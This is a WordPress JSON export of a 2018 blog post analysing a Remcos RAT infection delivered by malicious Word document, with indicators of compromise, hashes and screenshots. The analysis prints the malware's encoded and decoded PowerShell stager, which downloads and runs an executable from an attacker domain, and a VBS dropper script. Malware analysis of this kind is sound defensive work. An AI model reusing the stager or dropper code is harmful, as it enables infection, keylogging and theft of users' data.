{"id":1073,"date":"2018-02-18T07:56:47","date_gmt":"2018-02-18T07:56:47","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1073"},"modified":"2018-02-18T07:56:47","modified_gmt":"2018-02-18T07:56:47","slug":"2018-02-17-remcos-rat-from-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1073","title":{"rendered":"2018-02-17 Remcos RAT from malspam"},"content":{"rendered":"<p>Earlier this morning I came across some emails that had a subject line that caught my attention. They were all from the same sender and all of them had the same maldoc attached to them. From what I can tell this looks to be related to the REMCOS RAT as documented by Fortinet <a href=\"http:\/\/blog.fortinet.com\/2017\/02\/14\/remcos-a-new-rat-in-the-wild-2\" rel=\"noopener\" target=\"_blank\">here<\/a>. The interesting tidbit with this one was the fact that it was keylogging and also taking screenshots of my desktop as well from time to time. As usual, for any of the PCAPs, ProcMon logs, and artifacts that I managed to capture, check out the Github repo located <a href=\"http:\/\/github.com\/bloomer1016\/2018-02-17-Remcos-RAT\" rel=\"noopener\" target=\"_blank\">here<\/a>. I also uploaded the maldoc to AnyRun which you can see <a href=\"http:\/\/app.any.run\/tasks\/29db8b75-2af6-4690-b100-81e0c74dc026#\" rel=\"noopener\" target=\"_blank\">here<\/a>.<\/p>\n<p>***Note: The last time I checked the domain telebotdb[.]tk was wide open and was allowing anyone to traverse through the site. I was not able to find anything much outside of the file &#8220;Twin.exe.&#8221;<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/email.png\" alt=\"\" width=\"1938\" height=\"1230\" class=\"aligncenter size-full wp-image-1074\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/email-routes.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/email-routes.png\" alt=\"\" width=\"2304\" height=\"334\" class=\"aligncenter size-full wp-image-1075\" \/><\/a><\/p>\n<p>IOCs:<br \/>\n=====<br \/>\ntelebotdb[.]tk \/ 136[.]243.226[.]141 (GET \/Lift\/Payment_output2ED76B0.exe)<br \/>\n84[.]38.135[.]152:49195 (TCP)<\/p>\n<p>Artifacts:<br \/>\n==========<br \/>\nFile name: Payment_book2.doc<br \/>\nFile size: 131KB<br \/>\nFile path: NA<br \/>\nMD5 hash: 52d9f3297467bfb88971fcc4d8285911<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/e1be7ddffbb9bd02a2e0abb2fa403b51a22e836c95698d2be9c3347b83da0c46\/analysis\/\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/e1be7ddffbb9bd02a2e0abb2fa403b51a22e836c95698d2be9c3347b83da0c46\/analysis\/<\/a><br \/>\nDetection ratio: 6 \/ 59<br \/>\nFirst Detected: 2018-02-16 17:40:03 UTC<br \/>\nHybrid Analysis: <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/e1be7ddffbb9bd02a2e0abb2fa403b51a22e836c95698d2be9c3347b83da0c46?environmentId=100\" rel=\"noopener\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/e1be7ddffbb9bd02a2e0abb2fa403b51a22e836c95698d2be9c3347b83da0c46?environmentId=100<\/a><\/p>\n<p>File name: Payment_output2ED76B0.exe \/ bxPZAxDnDdsUBPSQmv.exe<br \/>\nFile size: 588KB<br \/>\nFile path: C:\\Users\\%username%\\<br \/>\nMD5 hash: d803d66949ef2f42155e4136a37fddd2<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/5fabd58b9f449d92146053acaa89a1ceb8290ce4a942adafba4cb9365f3f17ba\/analysis\/\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/5fabd58b9f449d92146053acaa89a1ceb8290ce4a942adafba4cb9365f3f17ba\/analysis\/<\/a><br \/>\nDetection ratio: 17 \/ 68<br \/>\nFirst Detected: 2018-02-17 02:57:40 UTC<\/p>\n<p>File name: Newfile.exe<br \/>\nFile size: 588KB<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Roaming\\remcos\\<br \/>\nMD5 hash: d803d66949ef2f42155e4136a37fddd2<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/5fabd58b9f449d92146053acaa89a1ceb8290ce4a942adafba4cb9365f3f17ba\/analysis\/\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/5fabd58b9f449d92146053acaa89a1ceb8290ce4a942adafba4cb9365f3f17ba\/analysis\/<\/a><br \/>\nDetection ratio: 17 \/ 68<br \/>\nFirst Detected: 2018-02-17 02:57:40 UTC<\/p>\n<p>File name: logs.dat<br \/>\nFile size: Varies<br \/>\nFile path: C:\\Users\\%username%\\AppData\\Roaming\\remcos\\<br \/>\nMD5 hash: 718b8c8c91247793717a3cd755ad150c<br \/>\nVirustotal: NA<\/p>\n<p>File name: Twin.exe (I found this by crawling the domain)<br \/>\nFile size: 637KB<br \/>\nFile path: Unknown<br \/>\nMD5 hash: 55e033ebbc318fdbc1edaad07df2f5d4<br \/>\nVirustotal: NA<\/p>\n<p>Analysis:<br \/>\n=========<br \/>\nBelow is the overview on how this malware executed on my VM.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/processtree.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/processtree.png\" alt=\"\" width=\"1249\" height=\"211\" class=\"aligncenter size-full wp-image-1078\" \/><\/a><\/p>\n<p>Once the user opens the malicious Word document and enables the macro and runs it, the macro proceeds to trigger cmd.exe to run a PoSH script to get the malicious binary. Below is the original PoSH script base64 encoded:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\ncmd &amp; \/C CD C: &amp; PowerShell -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAdwBJAG4AUwBqAEcAdgBhAEMARwBKAGkAZwBPAEsAegBrACAAKAAgACQAeQB0AGMAeQBmAHgAaQBqAEUASABkAGoAUwByAHkAdwBVAHIAeQBHAFUAWgBOAGkAZwBwAEkAYQBSACAALAAgACQAYwBFAEoAdwBrAGgAcQBNAHIAUQBMAEUAagBmAHoAUwAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAHkAdABjAHkAZgB4AGkAagBFAEgAZABqAFMAcgB5AHcAVQByAHkARwBVAFoATgBpAGcAcABJAGEAUgAgACwAIAAkAGMARQBKAHcAawBoAHEATQByAFEATABFAGoAZgB6AFMAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAYwBFAEoAdwBrAGgAcQBNAHIAUQBMAEUAagBmAHoAUwAgACkAOwAgAH0ADQAKAHQAcgB5AHsADQAKAA0ACgAkAE8ASgB4AEUAaQBhAG8AWABxAGkAcQB0AG8AbwBXAD0AJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQArACcAXABiAHgAUABaAEEAeABEAG4ARABkAHMAVQBCAFAAUwBRAG0AdgAuAGUAeABlACcAOwANAAoAdwBJAG4AUwBqAEcAdgBhAEMARwBKAGkAZwBPAEsAegBrACAAJwBoAHQAdABwADoALwAvAHQAZQBsAGUAYgBvAHQAZABiAC4AdABrAC8ATABpAGYAdAAvAFAAYQB5AG0AZQBuAHQAXwBvAHUAdABwAHUAdAAyAEUARAA3ADYAQgAwAC4AZQB4AGUAJwAgACQATwBKAHgARQBpAGEAbwBYAHEAaQBxAHQAbwBvAFcAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=<\/pre>\n<p>which once decoded is the following:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nfunction wInSjGvaCGJigOKzk ( $ytcyfxijEHdjSrywUryGUZNigpIaR , $cEJwkhqMrQLEjfzS )\r\n{\r\n\t(New-Object System.Net.WebClient).DownloadFile( $ytcyfxijEHdjSrywUryGUZNigpIaR , $cEJwkhqMrQLEjfzS );\r\n\t(New-Object -com Shell.Application).ShellExecute( $cEJwkhqMrQLEjfzS );\r\n}\r\n\r\ntry\r\n{\r\n\t$OJxEiaoXqiqtooW=$env:USERPROFILE+'\\bxPZAxDnDdsUBPSQmv.exe';\r\n\twInSjGvaCGJigOKzk 'http:\/\/telebotdb.tk\/Lift\/Payment_output2ED76B0.exe' $OJxEiaoXqiqtooW;\r\n}\r\ncatch{}<\/pre>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/wireshark-binary1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/wireshark-binary1.png\" alt=\"\" width=\"1664\" height=\"1106\" class=\"aligncenter size-full wp-image-1083\" \/><\/a><\/p>\n<p>Once the file &#8220;Payment_output2ED76B0.exe&#8221; has been downloaded, copied to the &#8220;C:\\Users\\%username%\\&#8221; path, renamed to &#8220;bxPZAxDnDdsUBPSQmv.exe,&#8221; and finally executed, it proceeded to use the UAC bypass that SANS discussed here (http:\/\/isc.sans.edu\/forums\/diary\/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware\/22011\/) in order to get the malware to run as seen below from ProcMon:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/uac-bypass.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/uac-bypass.png\" alt=\"\" width=\"2460\" height=\"1274\" class=\"aligncenter size-full wp-image-1080\" \/><\/a><\/p>\n<p>It is here that I was not able to obtain the &#8220;install.vbs&#8221; script located in the &#8220;C:\\Users\\%username%\\AppData\\Local\\Temp\\&#8221; folder on my VM, but using AnyRun I was able to get it. There appeared to be an attempt (perhaps) at an anti-sandbox trick at the beginning of the script (WScriptSleep 1000 &#8211; maybe fat-fingered). It then proceeded to delete the file &#8220;bxPZAxDnDdsUBPSQmvexe&#8221; and create the file (Newfileexe) in the &#8220;C:\\Users\\%username%\\AppData\\Roaming\\remcos\\&#8221; path.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nWScriptSleep 1000\r\nSet fso = CreateObject(&quot;ScriptingFileSystemObject&quot;)\r\nfsoDeleteFile &quot;C:\\Users\\%username%\\bxPZAxDnDdsUBPSQmvexe&quot;\r\nCreateObject(&quot;WScriptShell&quot;)Run &quot;cmd \/c &quot;&quot;C:\\Users\\%username%\\AppData\\Roaming\\remcos\\Newfileexe&quot;&quot;&quot;, 0\r\nfsoDeleteFile(WscriptScriptFullName)<\/pre>\n<p>Once the &#8220;Newfile.exe&#8221; process was up and running, it spawned a couple of other processes (iexplore.exe and svchost.exe) in what appeared to be another UAC bypass. It was also responsible for the keylogging\/screengrab capability:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/Newfile-screenshots.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/Newfile-screenshots.png\" alt=\"\" width=\"1280\" height=\"800\" class=\"aligncenter size-full wp-image-1077\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/screenshots.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/screenshots.png\" alt=\"\" width=\"1280\" height=\"800\" class=\"aligncenter size-full wp-image-1079\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/keylogger.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/keylogger.png\" alt=\"\" width=\"1264\" height=\"1174\" class=\"aligncenter size-full wp-image-1076\" \/><\/a><\/p>\n<p>along with communicating back to the IP address of 84.38.135.152 using port 49195 to ship back what was in the &#8220;logs.dat&#8221; file and any screengrabs from the &#8220;C:\\Users\\%username%\\AppData\\Roaming\\Screenshots&#8221; folder. <\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/wireshark.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/wireshark.png\" alt=\"\" width=\"2560\" height=\"1218\" class=\"aligncenter size-full wp-image-1081\" \/><\/a><\/p>\n<p>I also noticed when looking at the ProcMon logs using the FILES_WRITTEN filter that there were two different INI files that were modified. I am not sure what had been modified but found this interesting as I have never seen this before. Both files look to be exactly the same though.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/ini.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/02\/ini.png\" alt=\"\" width=\"1730\" height=\"1024\" class=\"aligncenter size-full wp-image-1082\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Earlier this morning I came across some emails that had a subject line that caught my attention. They were all from the same sender and all of them had the same maldoc attached to them. From what I can tell this looks to be related to the REMCOS RAT as documented by Fortinet here. The interesting tidbit with this one was the fact that it was keylogging and also taking screenshots of my desktop as well from time to time. As usual, for any of the PCAPs, ProcMon logs, and artifacts that I managed to capture, check out the Github&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=1073\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":1074,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[21,20],"class_list":["post-1073","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-packet-analysis","tag-rat","tag-remcos-rat"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1073","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1073"}],"version-history":[{"count":1,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1073\/revisions"}],"predecessor-version":[{"id":1084,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1073\/revisions\/1084"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/media\/1074"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1073"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1073"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1073"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}